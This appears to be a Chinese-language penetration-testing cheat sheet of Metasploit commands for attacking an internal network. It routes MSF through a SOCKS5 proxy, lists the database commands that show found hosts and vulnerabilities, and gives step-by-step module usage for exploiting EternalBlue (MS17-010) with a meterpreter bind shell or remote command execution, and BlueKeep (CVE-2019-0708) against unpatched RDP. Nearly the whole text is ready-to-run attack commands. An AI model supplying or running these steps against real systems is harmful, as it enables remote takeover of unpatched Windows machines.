• 将msf代理到内网中,使用命令

    1
    setg Proxies socks5:你的socksIP:端口
  • MSF 扫描到的资产或者漏洞保存在数据库,方便我们梳理,常用的就是这两个语句:

    1
    services      查看扫描到的资产IP及端口
    1
    vulns      查看扫描到的漏洞资产
  • 关于永恒之蓝的利用

    如果目标操作系统是 Win7x64、2008x64 的,可以直接使用正向代理 exploit 利用模块打过去:

    1
    2
    3
    use exploit/windows/smb/ms17_010_eternalblue
    set payload windows/x64/meterpreter/bind_tcp
    run

    要是目标系统是 2003x32、Win7x32 的只能使用这个模块去执行命令

    1
    2
    3
    use auxiliary/admin/smb/ms17_010_command
    set command whoami
    run
  • CVE-2019-0708-远程代码执行

    目标开启了 3389,且未打补丁

    1
    2
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    run